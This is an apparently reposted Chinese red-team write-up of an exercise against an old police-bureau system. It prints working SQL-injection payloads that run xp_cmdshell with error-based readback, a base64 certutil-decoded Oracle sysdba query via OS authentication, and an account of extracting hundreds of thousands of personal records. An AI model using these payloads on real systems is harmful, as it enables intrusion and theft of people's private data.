某次护网站库分离不出网横向仅一台实纪

admin 2026-09-15 04:59:21 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文分享一次针对某市公安局老系统的渗透实战过程,涉及站库分离环境下的SQL注入利用、将注入点改造为HTTP通道实现内网命令执行、内网存活主机测绘、Oracle数据库OS认证提权,最终获取数十万条住宿及人员敏感数据。文章强调未授权攻击属非法行为,仅供技术经验分享。 综合评分: 45 文章分类: 渗透测试,红队,内网渗透


某次护网站库分离不出网横向仅一台实纪

原创

zkaq-石英 zkaq-石英

掌控安全EDU

2026年9月13日 12:19 江西

在小说阅读器读本章

去阅读

在公众号小说中沉浸阅读

扫码领资料

获网安教程

本文由掌控安全学院 – 石英 投稿

Track安全社区投稿~

千元稿费!还有保底奖励~(  https://bbs.zkaq.cn   )****

文章中涉及的敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果自行承担!

其实整体过程虽然曲折,但是好在拿了一些分,所以给大家分享一下。

打的是某市公安局很老的一个系统,当时的大概整体过程如下

  1. 从互联网进来后先撞上站库分离:注入点的 xp_cmdshell 实际跑在内网数据库主机 192.168.2.6 上,公网只是 NAT 映射入口
  2. 内网 DB 主机无默认路由、无 DNS、网络层彻底隔离,反弹 shell / 工具回传全不可行 —— 于是把 SQL 注入点改造成准 C2:一条”命令写临时表 + RAISERROR 回显”的两步 HTTP 通道做交互式命令执行,内网测绘全程走这条 HTTP 通道完成;
  3. 内网测绘手法全靠注入通道执行 ipconfig / route print / arp -a / net view / nslookup,再用 C# 编译的小工具做全子网存活扫描,还识别出透明代理对 SMTP/POP/IMAP 出站端口的”伪象 OPEN”(不存在的主机上 25/110/143 全”通”),避免把假端口当真目标;
  4. 跨数据库类型提权:SYSTEM → 本机 Oracle 11g OS 认证sqlplus / as sysdba → 全库控制 → 旅馆业住宿 43.9 万 + 人员 35.4 万 + 身份证 5 万,百万级 PII(1.1 十万级+);
  5. 后端是一条线打满:未授权 → SQLi(sa) → 站库分离 → SYSTEM → Oracle sysdba → 后台明文口令 → 双库控制 → 内网横向 2.x。

好在是拿到了几十万数据分,不然废了半天劲可就打水漂了

话不多说

首先是前端 js 扫了下接口,然后测试发现一个报错注入点

然后我就直接上 sqlmap 了,嗯,不出意外的直接把连接池扫崩了,我真是服了啊,最后等了一个钟头,只能老老实实手测

不过手测也并不顺利,好消息是可以 xp_cmd

但是因为执行的过程默认不回显(执行成功就不显示报错了),所以就把命令结果写入临时表,在通过报错读出来

第一步,写入临时表的 poc

';DELETE FROM dw_tmp;INSERT INTO dw_tmp EXEC master..xp_cmdshell 'whoami';--

读取结果的命令

';DECLARE @x nvarchar(4000);SET @x='';SELECT @x=@x+ISNULL(o,'')+CHAR(10) FROM dw_tmp WHERE o NOT LIKE '%SystemDrive%';SELECT @x=REPLACE(@x,'%','%%');RAISERROR(@x,16,1);--

然后就找 ai 大人写了个脚本,嗯,这样就方便多了

本来到这里都以为已经游戏结束了,然后发现不出网,DNS 通道都不出,然后又开始探测 web 目录,最后折腾了半天发现是站库分离

没办法只能开始尝试横向,看了下路由表,嗯,无收获,无默认路由、无其他网段、IP 转发=否

nslookup .1/.3/.6  全部无响应(无 DNS 服务器)

net view /all /domain 无输出 → 无域、无可见共享(WORKGROUP)

没办法,不出网工具搞不进去,好在是有 C#

所以现场编译了个全子网存活扫描

在 .6 上 D:\tmp\ 编译 C# 小程序做 ICMP + TCP 全子网探测:

最后全子网仅 2 台存活主机192.168.2.3(web)+ 192.168.2.6(DB)

在对 2.3 尝试了半天发现无果之后只好将目标转会到本机的其他服务,这时候也算是峰回路转了

发现本机还有台 Oracle, 然后因为Oracle 配了OS 认证(sqlnet.ora SQLNET.AUTHENTICATION_SERVICES 允许),SYSTEM 进程用 sqlplus -s / as sysdba 免密登 sysdba。

然后经过一番探测,发现了存有住客记录的表格,也是发现了几十万三要素,没白来没白来

整合命令

echo c2V0IGhlYWRpbmcgb2ZmOwpzZXQgZmVlZGJhY2sgb2ZmOwpzZXQgbGluZXNpemUgMzAwOwpzZWxlY3QgWE18fGNocigxMjQpfHxHTVNGSE18fGNocigxMjQpfHxTSkhNfHxjaHIoMTI0KXx8VFhaSE18fGNocigxMjQpfHxDU1JRIGZyb20gTEdZUVQuUllKQlhYIHdoZXJlIHJvd251bTw9MzsKc2VsZWN0IG93bmVyfHwnLid8fHRhYmxlX25hbWV8fCc6J3x8bnVtX3Jvd3MgZnJvbSBhbGxfdGFibGVzIHdoZXJlIG93bmVyIGluICgnTEdZUVQnLCdDU1paQkInLCdLRFknLCdVQVYnKSBhbmQgbnVtX3Jvd3M+NTAwIG9yZGVyIGJ5IG51bV9yb3dzIGRlc2M7CmV4aXQ7Cg== > D:\tmp\q.b64 & certutil -decode -f D:\tmp\q.b64 D:\tmp\q.sql & D:\app\******\sqlplus.exe -s / as sysdba @D:\tmp\q.sql & del D:\tmp\q.b64

补充:接管前台 WEB 之后发现里面没有上传点(烦死了)!!!

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

没看够~?欢迎关注!

分享本文到朋友圈,可以凭截图找老师领取

上千教程+工具+交流群+靶场账号

分享后扫码加我!

回顾往期内容

网络安全人员必考的几本证书!

文库|内网神器cs4.0使用说明书

重生HW之感谢客服小姐姐带我进入内网遨游

手把手教你CNVD漏洞挖掘 + 资产收集

【精选】SRC快速入门+上分小秘籍+实战指南

代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!

点赞+在看支持一下吧~感谢看官老爷~

你的点赞是我更新的动力


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:掌控安全EDU zkaq-石英 zkaq-石英《某次护网站库分离不出网横向仅一台实纪》

评论:0   参与:  0